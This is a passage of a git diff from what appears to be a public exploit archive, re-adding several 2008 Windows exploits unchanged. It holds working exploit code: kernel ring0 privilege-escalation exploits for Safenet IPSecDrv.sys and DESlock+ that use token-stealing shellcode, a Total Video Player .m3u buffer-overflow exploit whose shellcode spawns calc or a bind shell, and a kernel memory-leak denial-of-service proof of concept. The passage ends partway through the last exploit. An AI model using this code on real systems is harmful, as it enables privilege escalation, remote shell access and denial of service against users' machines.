+        *zlen = sizeof winxp_ring0_shell - 1;
+        *(PDWORD) &winxp_ring0_shell[55] = ppid;
+        return (winxp_ring0_shell);
+
+      case 2:
+        *zlen = sizeof win2k3_ring0_shell - 1;
+        *(PDWORD) &win2k3_ring0_shell[58] = ppid;
+        return (win2k3_ring0_shell);
+
+      default:
+        fprintf (stderr, "* GetVersion, unsupported version\n");
+        exit (EXIT_FAILURE);
+    }
+
+  return (NULL);
+}
+
+static PVOID
+get_module_base (void)
+{
+  PSYSTEM_MODULE_INFORMATION_ENTRY pModuleBase;
+  PSYSTEM_MODULE_INFORMATION pModuleInfo;
+  DWORD i, num_modules, status, rlen;
+  PVOID result;
+
+  status = NtQuerySystemInformation (SystemModuleInformation, NULL, 0, &rlen);
+  if (status != STATUS_INFO_LENGTH_MISMATCH)
+    {
+      fprintf (stderr, "* NtQuerySystemInformation failed, 0x%08X\n", status);
+      exit (EXIT_FAILURE);
+    }
+
+  pModuleInfo = (PSYSTEM_MODULE_INFORMATION) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, rlen);
+
+  status = NtQuerySystemInformation (SystemModuleInformation, pModuleInfo, rlen, &rlen);
+  if (status != STATUS_SUCCESS)
+    {
+      fprintf (stderr, "* NtQuerySystemInformation failed, 0x%08X\n", status);
+      exit (EXIT_FAILURE);
+    }
+
+  num_modules = pModuleInfo->Count;
+  pModuleBase = &pModuleInfo->Module[0];
+  result = NULL;
+
+  for (i = 0; i < num_modules; i++, pModuleBase++)
+    if (strstr (pModuleBase->ImageName, "IPSECDRV.sys"))
+      {
+        result = pModuleBase->Base;
+        break;
+      }
+
+  HeapFree (GetProcessHeap (), HEAP_NO_SERIALIZE, pModuleInfo);
+
+  return (result);
+}
+
+int
+main (int argc, char **argv)
+{
+  struct ioctl_req req;
+  LPVOID c_addr, p_addr;
+  LPVOID zpage, zbuf, base, pbase;
+  DWORD rlen, zlen, ppid;
+  HANDLE hFile;
+  BOOL result;
+
+  printf ("Safenet IPSecDrv.sys <= 10.4.0.12 local kernel ring0 SYSTEM exploit\n"
+          "by: \n"
+          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
+
+  if (argc <= 1)
+    {
+      fprintf (stderr, "Usage: %s \n", argv[0]);
+      exit (EXIT_SUCCESS);
+    }
+
+  ppid = atoi (argv[1]);
+
+  hFile = CreateFileA ("\\\\.\\IPSecDrv", FILE_EXECUTE,
+                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
+                       OPEN_EXISTING, 0, NULL);
+  if (hFile == INVALID_HANDLE_VALUE)
+    {
+      fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
+      exit (EXIT_FAILURE);
+    }
+
+  zpage = VirtualAlloc (NULL, 0x10000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+  if (zpage == NULL)
+    {
+      fprintf (stderr, "* VirtualAlloc failed\n");
+      exit (EXIT_FAILURE);
+    }
+  printf ("* allocated page: 0x%08X [%d-bytes]\n",
+          zpage, 0x10000);
+
+  c_addr = zpage;
+  base = get_module_base ();
+  p_addr = (LPVOID) ((DWORD) ((LPVOID) &c_addr - (base + 0x1C604)) / 16);
+  printf ("* base: 0x%08X, p: 0x%08X\n", base + 0x1C604, &c_addr);
+  printf ("* call distance: 0x%08X\n", p_addr);
+
+  memset (zpage, 0xCC, 0x10000);
+  zbuf = fixup_ring0_shell (base, ppid, &zlen);
+  memcpy (zpage, win32_fixup, sizeof (win32_fixup) - 1);
+  memcpy (zpage + sizeof (win32_fixup) - 1, zbuf, zlen);
+  memcpy (zpage + sizeof (win32_fixup) + zlen - 1,
+          win32_ret, sizeof (win32_ret) - 1);
+
+  memset (&req, 0, sizeof req);
+  req.arg[0] = p_addr;
+
+  /* jump to our address   :)   */
+  printf ("* jumping.. ");
+  result = DeviceIoControl (hFile, IPSECDRV_IOCTL,
+                            &req, sizeof req, &req, sizeof req, &rlen, 0);
+  if (!result)
+    {
+      fprintf (stderr, "* DeviceIoControl failed\n");
+      exit (EXIT_FAILURE);
+    }
+  printf ("done\n\n"
+          "* hmmm, you didn't STOP the box?!?!\n");
+
+  CloseHandle (hFile);
+
+  return (EXIT_SUCCESS);
+}
+
+// milw0rm.com [2008-01-29]
diff --git a/platforms/windows/local/5077.cpp b/platforms/windows/local/5077.cpp
index 25e22654c..779cb48f7 100755
--- a/platforms/windows/local/5077.cpp
+++ b/platforms/windows/local/5077.cpp
@@ -1,134 +1,134 @@
-/*0day Total Video Player V1.20 .M3u File Local Stack Buffer Overflow
-This exploit spawns Calc.exe or binds a port and spawns a shell and tested on Windows Xp sp 2.
-I got the ideea to look in a prior version of TVP and
-surprinse vuln to ,just as V1.30.
-When parsing a crafted .m3u file stack gets corrupted,due a 
-long string,and causes a stack overflow.We get control of the EBP and
-EIP registers.The ESP register points exactly after the retaddress position.
-[corrupted stack] [EIP->points here][ESP->points here]
-So do a jmp back and a JMP ESP and it points to a specific part of
-the stack that I want.Credits to finding this bug && sploit go to fl0 fl0w.
-Vendor not informed yet.
-Special THANKS to Expanders !!!!
-*/ 
-#include
-#include 
-#include 
-#include
-
-#define FIRST "#EXTM3U\r\n#EXTINF:3:50,-Ombladon - Noapte Buna Bucuresti Feat. Guesswho\r\nD:\\"
-#define LAST ".mp3\r\n"
-#define OFFSET 545
-
-#define EVILFILE "evil.m3u"
-
-//shellcode from metasploit
-char scz1[]=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
-"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
-"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
-"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
-"\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
-"\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
-"\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
-"\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
-"\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
-"\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
-"\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
-"\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
-"\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
-"\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
-"\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
-"\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
-"\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
-"\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
-"\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
-"\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
-"\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57"
-"\x70\x63";
-char scz2[]="\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
-"\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
-"\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
-"\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
-"\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
-"\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
-"\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
-"\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
-"\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
-"\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
-"\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
-"\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
-"\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
-"\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
-"\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
-"\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
-"\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
-"\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
-"\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
-"\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
-"\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
-"\x03\x75\x2c\x6f\x80\x8a\xfa\x90";
-
-char jmpback[] = "\xE9\xDE\xFD\xFF\xFF"; 
-void Notes();
-
-    int main()
- { 
-    FILE *p;
-  unsigned char *buffer;
-  unsigned int offset=0;
-  unsigned int retaddress=0x015EE557;
-  int input=0;
-  Notes();
-   if((p=fopen(EVILFILE,"wb"))==NULL)
-{ printf("error\n"); exit(0);
-   }
-   scanf("%d",&input);
-   switch(input)
-  {  case 1:
-             buffer=(unsigned char *)malloc(OFFSET+5+strlen(scz1)+12);
-        
-             memset(buffer+offset,0x90,OFFSET+5+strlen(scz1)+12);
-             offset=OFFSET;
-     
-             memcpy(buffer+offset,&retaddress,4);    
-             offset=OFFSET+4;
-             offset+=12;
-             memcpy(buffer+offset,scz1,strlen(scz1));
-             offset+=strlen(scz1); 
-             memset(buffer+offset,0x00,1);
-             fprintf(p,"%s%s%s",FIRST,buffer,LAST);
-             fclose(p);  
-                                                                         break;
-    case 2:              
-             buffer=(unsigned char *)malloc(OFFSET+5+strlen(scz2)+12);
-        
-             memset(buffer+offset,0x90,OFFSET+5+strlen(scz2)+12);
-             offset=OFFSET;
-     
-             memcpy(buffer+offset,&retaddress,4);    
-             offset=OFFSET+4;
-             offset+=12;
-             memcpy(buffer+offset,scz2,strlen(scz2));
-             offset+=strlen(scz2); 
-             memset(buffer+offset,0x00,1);
-             fprintf(p,"%s%s%s",FIRST,buffer,LAST);
-             fclose(p); 
-                                                                          break;
-  }  
-
- free(buffer);
- return 0;
-  }
-  
-void Notes()
-{   printf("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n");
-    printf("Total Video Player V1.20 .M3u File Local Stack Buffer Overflow\n");
-    printf("Credits for finding this bug&&sploit go to fl0 fl0w\n");
-    printf("SPECIAL THANKS TO EXPANDERS\n\n");
-    printf("{1}Spawn Calc.exe\n");
-    printf("{2}Bind port&&spanw a shell\n\n"); 
-    printf("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n");
-}  
-
-// milw0rm.com [2008-02-07]
+/*0day Total Video Player V1.20 .M3u File Local Stack Buffer Overflow
+This exploit spawns Calc.exe or binds a port and spawns a shell and tested on Windows Xp sp 2.
+I got the ideea to look in a prior version of TVP and
+surprinse vuln to ,just as V1.30.
+When parsing a crafted .m3u file stack gets corrupted,due a 
+long string,and causes a stack overflow.We get control of the EBP and
+EIP registers.The ESP register points exactly after the retaddress position.
+[corrupted stack] [EIP->points here][ESP->points here]
+So do a jmp back and a JMP ESP and it points to a specific part of
+the stack that I want.Credits to finding this bug && sploit go to fl0 fl0w.
+Vendor not informed yet.
+Special THANKS to Expanders !!!!
+*/ 
+#include
+#include 
+#include 
+#include
+
+#define FIRST "#EXTM3U\r\n#EXTINF:3:50,-Ombladon - Noapte Buna Bucuresti Feat. Guesswho\r\nD:\\"
+#define LAST ".mp3\r\n"
+#define OFFSET 545
+
+#define EVILFILE "evil.m3u"
+
+//shellcode from metasploit
+char scz1[]=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
+"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
+"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
+"\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
+"\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
+"\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
+"\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
+"\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
+"\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
+"\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
+"\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
+"\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
+"\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
+"\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
+"\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
+"\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
+"\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
+"\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
+"\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
+"\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57"
+"\x70\x63";
+char scz2[]="\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
+"\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
+"\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
+"\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
+"\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
+"\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
+"\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
+"\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
+"\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
+"\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
+"\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
+"\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
+"\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
+"\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
+"\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
+"\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
+"\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
+"\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
+"\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
+"\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
+"\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
+"\x03\x75\x2c\x6f\x80\x8a\xfa\x90";
+
+char jmpback[] = "\xE9\xDE\xFD\xFF\xFF"; 
+void Notes();
+
+    int main()
+ { 
+    FILE *p;
+  unsigned char *buffer;
+  unsigned int offset=0;
+  unsigned int retaddress=0x015EE557;
+  int input=0;
+  Notes();
+   if((p=fopen(EVILFILE,"wb"))==NULL)
+{ printf("error\n"); exit(0);
+   }
+   scanf("%d",&input);
+   switch(input)
+  {  case 1:
+             buffer=(unsigned char *)malloc(OFFSET+5+strlen(scz1)+12);
+        
+             memset(buffer+offset,0x90,OFFSET+5+strlen(scz1)+12);
+             offset=OFFSET;
+     
+             memcpy(buffer+offset,&retaddress,4);    
+             offset=OFFSET+4;
+             offset+=12;
+             memcpy(buffer+offset,scz1,strlen(scz1));
+             offset+=strlen(scz1); 
+             memset(buffer+offset,0x00,1);
+             fprintf(p,"%s%s%s",FIRST,buffer,LAST);
+             fclose(p);  
+                                                                         break;
+    case 2:              
+             buffer=(unsigned char *)malloc(OFFSET+5+strlen(scz2)+12);
+        
+             memset(buffer+offset,0x90,OFFSET+5+strlen(scz2)+12);
+             offset=OFFSET;
+     
+             memcpy(buffer+offset,&retaddress,4);    
+             offset=OFFSET+4;
+             offset+=12;
+             memcpy(buffer+offset,scz2,strlen(scz2));
+             offset+=strlen(scz2); 
+             memset(buffer+offset,0x00,1);
+             fprintf(p,"%s%s%s",FIRST,buffer,LAST);
+             fclose(p); 
+                                                                          break;
+  }  
+
+ free(buffer);
+ return 0;
+  }
+  
+void Notes()
+{   printf("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n");
+    printf("Total Video Player V1.20 .M3u File Local Stack Buffer Overflow\n");
+    printf("Credits for finding this bug&&sploit go to fl0 fl0w\n");
+    printf("SPECIAL THANKS TO EXPANDERS\n\n");
+    printf("{1}Spawn Calc.exe\n");
+    printf("{2}Bind port&&spanw a shell\n\n"); 
+    printf("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n");
+}  
+
+// milw0rm.com [2008-02-07]
diff --git a/platforms/windows/local/5141.c b/platforms/windows/local/5141.c
index c6e62a70e..d9273056e 100755
--- a/platforms/windows/local/5141.c
+++ b/platforms/windows/local/5141.c
@@ -1,94 +1,94 @@
-/* deslock-list-leak.c
- *
- * Copyright (c) 2008 by 
- *
- * DESlock+ <= 3.2.6 local kernel mem leak POC
- * by mu-b - Fri 21 Dec 2007
- *
- * - Tested on: DLMFENC.sys 1.0.0.26
- *
- * kernel pool memory leak by continually allocating link list
- * structures and never freeing them. This is not without a sense
- * of irony in that each element must correspond to a unique
- * ProcessID (arg[0]). Thus, adding a single element incurs a
- * linear cost due to search :(. (O((n^2+n)/2) overall cost.)
- *
- *    - Private Source Code -DO NOT DISTRIBUTE -
- * http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
- */
-
-#include 
-#include 
-
-#include 
-
-#define DLMFENC_IOCTL 0x0FA4204C
-#define DLMFENC_FLAG  0xC001D00D
-
-#define ARG_SIZE(a)   ((a-(sizeof (int)*2))/sizeof (void *))
-
-struct ioctl_req {
-  int flag;
-  int req_num;
-  void *arg[ARG_SIZE(0x20)];
-};
-
-static void
-xor_mask_req (struct ioctl_req *req)
-{
-  DWORD i, pid;
-  PCHAR ptr;
-
-  pid = GetCurrentProcessId ();
-  for (i = 0, ptr = (PCHAR) req; i < 0x0C; i++, ptr++)
-    *ptr ^= pid;
-}
-
-int
-main (int argc, char **argv)
-{
-  struct ioctl_req req;
-  DWORD i, rlen;
-  HANDLE hFile;
-  BOOL result;
-
-  printf ("DESlock+ <= 3.2.6 local kernel mem leak PoC\n"
-          "by: \n"
-          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
-
-  hFile = CreateFileA ("\\\\.\\DLKPFSD_Device", FILE_EXECUTE,
-                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
-                       OPEN_EXISTING, 0, NULL);
-  if (hFile == INVALID_HANDLE_VALUE)
-    {
-      fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
-      exit (EXIT_FAILURE);
-    }
-
-  memset (&req, 0, sizeof req);
-
-  for (i = 0; i <= UINT_MAX; i++)
-    {
-      req.flag = DLMFENC_FLAG;
-      req.req_num = 0x03;
-      req.arg[0] = (void *) i;
-
-      xor_mask_req (&req);
-      result = DeviceIoControl (hFile, DLMFENC_IOCTL,
-                                &req, sizeof req, &req, sizeof req, &rlen, 0);
-      if (!result)
-        {
-          fprintf (stderr, "* DeviceIoControl failed\n");
-          exit (EXIT_FAILURE);
-        }
-
-      if (!(i % 64))
-        printf ("%d..", i);
-    }
-
-  CloseHandle (hFile);
-
-  return (EXIT_SUCCESS);
-}
-
-// milw0rm.com [2008-02-18]
+/* deslock-list-leak.c
+ *
+ * Copyright (c) 2008 by 
+ *
+ * DESlock+ <= 3.2.6 local kernel mem leak POC
+ * by mu-b - Fri 21 Dec 2007
+ *
+ * - Tested on: DLMFENC.sys 1.0.0.26
+ *
+ * kernel pool memory leak by continually allocating link list
+ * structures and never freeing them. This is not without a sense
+ * of irony in that each element must correspond to a unique
+ * ProcessID (arg[0]). Thus, adding a single element incurs a
+ * linear cost due to search :(. (O((n^2+n)/2) overall cost.)
+ *
+ *    - Private Source Code -DO NOT DISTRIBUTE -
+ * http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
+ */
+
+#include 
+#include 
+
+#include 
+
+#define DLMFENC_IOCTL 0x0FA4204C
+#define DLMFENC_FLAG  0xC001D00D
+
+#define ARG_SIZE(a)   ((a-(sizeof (int)*2))/sizeof (void *))
+
+struct ioctl_req {
+  int flag;
+  int req_num;
+  void *arg[ARG_SIZE(0x20)];
+};
+
+static void
+xor_mask_req (struct ioctl_req *req)
+{
+  DWORD i, pid;
+  PCHAR ptr;
+
+  pid = GetCurrentProcessId ();
+  for (i = 0, ptr = (PCHAR) req; i < 0x0C; i++, ptr++)
+    *ptr ^= pid;
+}
+
+int
+main (int argc, char **argv)
+{
+  struct ioctl_req req;
+  DWORD i, rlen;
+  HANDLE hFile;
+  BOOL result;
+
+  printf ("DESlock+ <= 3.2.6 local kernel mem leak PoC\n"
+          "by: \n"
+          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
+
+  hFile = CreateFileA ("\\\\.\\DLKPFSD_Device", FILE_EXECUTE,
+                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
+                       OPEN_EXISTING, 0, NULL);
+  if (hFile == INVALID_HANDLE_VALUE)
+    {
+      fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
+      exit (EXIT_FAILURE);
+    }
+
+  memset (&req, 0, sizeof req);
+
+  for (i = 0; i <= UINT_MAX; i++)
+    {
+      req.flag = DLMFENC_FLAG;
+      req.req_num = 0x03;
+      req.arg[0] = (void *) i;
+
+      xor_mask_req (&req);
+      result = DeviceIoControl (hFile, DLMFENC_IOCTL,
+                                &req, sizeof req, &req, sizeof req, &rlen, 0);
+      if (!result)
+        {
+          fprintf (stderr, "* DeviceIoControl failed\n");
+          exit (EXIT_FAILURE);
+        }
+
+      if (!(i % 64))
+        printf ("%d..", i);
+    }
+
+  CloseHandle (hFile);
+
+  return (EXIT_SUCCESS);
+}
+
+// milw0rm.com [2008-02-18]
diff --git a/platforms/windows/local/5144.c b/platforms/windows/local/5144.c
index 3cd5e0e66..90684af7f 100755
--- a/platforms/windows/local/5144.c
+++ b/platforms/windows/local/5144.c
@@ -1,343 +1,343 @@
-/* deslock-pown-v2.c
- *
- * Copyright (c) 2008 by 
- *
- * DESlock+ <= 3.2.6 local kernel ring0 SYSTEM exploit
- * by mu-b - Wed 26 Dec 2007
- *
- * - Tested on: DLMFDISK.sys 1.2.0.27
- *              - Microsoft Windows 2003 SP2
- *              - Microsoft Windows XP SP2
- *
- * Note: create a mountable filesystem (size/password is irrelevant),
- * name the pseudo-filesystem "XXXAAAA.mnt" and copy to "?:\",
- * finally mount the pseudo-filesystem and ./deslock-pown-v2 for SYSTEM.
- *
- * Compile: MinGW + -lntdll
- *
- *    - Private Source Code -DO NOT DISTRIBUTE -
- * http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
- */
-
-#include 
-#include 
-
-#include 
-#include 
-
-#define DLKFDISK_IOCTL    0x80002024
-#define DLKFDISK_R_IOCTL  0x80002010
-#define DLKFDISK_SLOT     0x00000C5A
-#define DLKFDISK_OFFSET   0x0D
-#define DLKFDISK_DISK_MAX 0x1A
-
-static unsigned char win32_fixup[] =
-  "\x53"
-  "\xeb\x0e"
-  /* _fixup_copy  */
-  "\x5e"
-  "\xbf\x5c\x0c\x00\x00"
-  "\x31\xc9"
-  "\xb1\x05"
-  "\xf3\xa5"
-  "\xeb\x19"
-  /* _fixup_blk   */
-  "\xe8\xed\xff\xff\xff"
-  "\x64\x0a\x00\x00"
-  "\xd3\x0a\x00\x00"
-  "\x2a\x0a\x00\x00"
-  "\x49\x0a\x00\x00"
-  "\x68\x0b\x00\x00";
-
-/* Win2k3 SP1/2 - kernel EPROCESS token switcher
- * by mu-b 
- */
-static unsigned char win2k3_ring0_shell[] =
-  /* _ring0 */
-  "\xb8\x24\xf1\xdf\xff"
-  "\x8b\x00"
-  "\x8b\xb0\x18\x02\x00\x00"
-  "\x89\xf0"
-  /* _sys_eprocess_loop   */
-  "\x8b\x98\x94\x00\x00\x00"
-  "\x81\xfb\x04\x00\x00\x00"
-  "\x74\x11"
-  "\x8b\x80\x9c\x00\x00\x00"
-  "\x2d\x98\x00\x00\x00"
-  "\x39\xf0"
-  "\x75\xe3"
-  "\xeb\x21"
-  /* _sys_eprocess_found  */
-  "\x89\xc1"
-  "\x89\xf0"
-
-  /* _cmd_eprocess_loop   */
-  "\x8b\x98\x94\x00\x00\x00"
-  "\x81\xfb\x00\x00\x00\x00"
-  "\x74\x10"
-  "\x8b\x80\x9c\x00\x00\x00"
-  "\x2d\x98\x00\x00\x00"
-  "\x39\xf0"
-  "\x75\xe3"
-  /* _not_found           */
-  "\xcc"
-  /* _cmd_eprocess_found
-   * _ring0_end           */
-
-  /* copy tokens!$%!      */
-  "\x8b\x89\xd8\x00\x00\x00"
-  "\x89\x88\xd8\x00\x00\x00"
-  "\x90";
-
-static unsigned char winxp_ring0_shell[] =
-  /* _ring0 */
-  "\xb8\x24\xf1\xdf\xff"
-  "\x8b\x00"
-  "\x8b\x70\x44"
-  "\x89\xf0"
-  /* _sys_eprocess_loop   */
-  "\x8b\x98\x84\x00\x00\x00"
-  "\x81\xfb\x04\x00\x00\x00"
-  "\x74\x11"
-  "\x8b\x80\x8c\x00\x00\x00"
-  "\x2d\x88\x00\x00\x00"
-  "\x39\xf0"
-  "\x75\xe3"
-  "\xeb\x21"
-  /* _sys_eprocess_found  */
-  "\x89\xc1"
-  "\x89\xf0"
-
-  /* _cmd_eprocess_loop   */
-  "\x8b\x98\x84\x00\x00\x00"
-  "\x81\xfb\x00\x00\x00\x00"
-  "\x74\x10"
-  "\x8b\x80\x8c\x00\x00\x00"
-  "\x2d\x88\x00\x00\x00"
-  "\x39\xf0"
-  "\x75\xe3"
-  /* _not_found           */
